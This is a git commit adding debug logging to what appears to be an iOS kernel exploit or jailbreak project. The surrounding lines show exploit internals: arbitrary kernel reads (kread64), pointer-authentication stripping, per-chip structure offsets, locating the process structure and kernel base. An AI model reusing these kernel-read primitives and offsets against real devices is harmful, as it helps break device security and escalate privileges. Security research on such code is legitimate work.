add some logs

This commit is contained in:
opa334 2022-09-06 11:59:45 +02:00
parent 961e9b3a53
commit 217df53ec3
2 changed files with 21 additions and 1 deletions

View File

@ -14,6 +14,7 @@
#import <spawn.h> #import <spawn.h>
#import <sys/stat.h> #import <sys/stat.h>
#include <sys/utsname.h> #include <sys/utsname.h>
#import <sys/sysctl.h>
extern uint64_t g_self_proc; extern uint64_t g_self_proc;
extern int g_exp_fallback; extern int g_exp_fallback;
@ -171,7 +172,12 @@ int dropRoot(void)
struct utsname u; struct utsname u;
uname(&u); uname(&u);
NSString* nsMachine = [NSString stringWithUTF8String:u.machine]; NSString* nsMachine = [NSString stringWithUTF8String:u.machine];
_modelLabel.text = [NSString stringWithFormat:@"Model: %@", nsMachine];
cpu_subtype_t cpuFamily = 0;
size_t cpuFamilySize = sizeof(cpuFamily);
sysctlbyname("hw.cpufamily", &cpuFamily, &cpuFamilySize, NULL, 0);
_modelLabel.text = [NSString stringWithFormat:@"Model: %@, CPU: 0x%X", nsMachine, cpuFamily];
} }
- (void)reloadExploitValue { - (void)reloadExploitValue {
@ -212,6 +218,8 @@ int dropRoot(void)
- (void)updateStatus:(NSString*)status - (void)updateStatus:(NSString*)status
{ {
NSLog(@"status: %@", status);
usleep(1000);
dispatch_async(dispatch_get_main_queue(), ^{ dispatch_async(dispatch_get_main_queue(), ^{
self.statusLabel.text = status; self.statusLabel.text = status;
}); });

View File

@ -48,8 +48,14 @@ uint64_t kernel_base_from_holder(mach_port_t holder, uint64_t holder_addr)
uint64_t fops = kread64(kobject + 0x28); uint64_t fops = kread64(kobject + 0x28);
uint64_t x68 = xpaci(kread64(kmsg + 0x68)); uint64_t x68 = xpaci(kread64(kmsg + 0x68));
badLog("x68: %llX", x68);
usleep(1000);
uint64_t self_ipc_space = xpaci(kread64(x68 + 0x50)); uint64_t self_ipc_space = xpaci(kread64(x68 + 0x50));
badLog("self_ipc_space: %llX", self_ipc_space);
usleep(1000);
uint64_t self_task = xpaci(kread64(self_ipc_space + 0x30)); uint64_t self_task = xpaci(kread64(self_ipc_space + 0x30));
badLog("self_task: %llX", self_task);
usleep(1000);
struct utsname u; struct utsname u;
uname(&u); uname(&u);
@ -80,7 +86,13 @@ uint64_t kernel_base_from_holder(mach_port_t holder, uint64_t holder_addr)
off_task_bsd_info = 0x3A0; // a9-a11 off_task_bsd_info = 0x3A0; // a9-a11
#endif #endif
badLog("off_task_bsd_info: %llX", off_task_bsd_info);
usleep(1000);
g_self_proc = xpaci(kread64(self_task + off_task_bsd_info)); g_self_proc = xpaci(kread64(self_task + off_task_bsd_info));
badLog("g_self_proc: %llX", g_self_proc);
usleep(1000);
// find kernel base // find kernel base
uint64_t pos = (fops & ~0x3FFF); uint64_t pos = (fops & ~0x3FFF);